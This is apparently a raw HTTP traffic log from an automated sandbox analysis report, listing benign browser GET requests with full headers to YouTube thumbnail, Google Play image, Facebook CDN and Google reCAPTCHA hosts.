    Source: global trafficHTTP traffic detected: GET /vi/pvJWQoLSWLo/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /9ym56k3o3YeZFBGADv92ebqeIfILUe07DK9PNPdsHF_Ide5S4PSG_dzl7Xpaxo9D8ME=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/3mkmZHd6xK8/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /9KAPlokfzeEFb34Mwm7juoiC5-yjpf4JlRLguuAgn5fV7JcTECwJnu6guLxbaZBWDA=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pQqL4JTm_4PS4UGdvVNnv4f0AYXeRwItrhlAhu84_jtUO-xslQmRaHgrJouYh82OPps=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iYwN4/yd/l/en_GB/lW1EzoN7_Oc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/a21q6qqmc1E/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ayEFwVZElGwAqSC4_lBrJNCJC7ayciaky2Qp7eOJqHHLjorWDgRsa_cKepjhc0d5xg=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /D4DUUFQDCsH9NIEa8hjMjQSWdtNhGX1Fd_jT-23ogAb5uMMqttqQDUJcUt4K_u8RYOQ=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LByrur1mTmPeNr0ljI-uAUcct1rzmTve5Esau1SwoAzjBXQUby6uHIfHbF9TAT51mgHm=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/8TVDWzeRSQs/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyoamGUDNElTvTw6wbvcu-kq-Jfwnx3ntQx6f8zKqEwiHshHJ8uv-kL1RFAGRyGyj2WnHdj7TAR-QNZ2I0Q; NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ij9m4/yu/l/en_GB/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npHAHmtZRgiMVEVg5pcncTIyqMW5MX--niR0L9PSzc5l8nuXS4GbU4w0yumQTururnc=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/EIi3C0sPHQ2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/kq5HPV5XpIY/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sqiP1qM7wG2bNZxazEogFapaGlhLWbYz_NI9BHCvNEe15mGtC0OYRQKYbdt_yD4pdSM=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /9KAPlokfzeEFb34Mwm7juoiC5-yjpf4JlRLguuAgn5fV7JcTECwJnu6guLxbaZBWDA=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Y9BUoMIWfhZDUFZ_MxQmnsgSyb3O8s8Sds65E_j46-vdDSJi_0Xqmoa-fHaQa7fGlw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/kqxAy363Pag/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/clr?k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AGteOyoamGUDNElTvTw6wbvcu-kq-Jfwnx3ntQx6f8zKqEwiHshHJ8uv-kL1RFAGRyGyj2WnHdj7TAR-QNZ2I0Q; NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
    Source: global trafficHTTP traffic detected: GET /9ym56k3o3YeZFBGADv92ebqeIfILUe07DK9PNPdsHF_Ide5S4PSG_dzl7Xpaxo9D8ME=s256-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /n9CeusCmd-m3uzx8dANuIBorYwG8L5ZbEdkYfVhIn5riLqMiviFPnEuzUveNXLdoVvew=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /4RtQ-xqvnSsLZhkVQFAc6qfC-JxyeH1iOm3r4GpAem9x6BhZTfX7CVreZtX1_cr9Sw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/aP5mQIXxLCE/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dl3h4f8JvKbmL4jtmqiTWof6bU6W2mKCzOmAHgdf0PUCanyZ0qQ19oXqRgn79R8qXKwV=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /-kxC4InQ01s06oRPVdInILaIitVUs5QD4IFGAFeXWTR62gAF-BPJuhXZi_cPvVB13oE=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pQqL4JTm_4PS4UGdvVNnv4f0AYXeRwItrhlAhu84_jtUO-xslQmRaHgrJouYh82OPps=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3mFQ9TxTUpICP96ePMtgZTMmwXdLmfh4LROdo2pJ-d-RU4NBZ6JnIWeVp92DgpqxgRMu=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
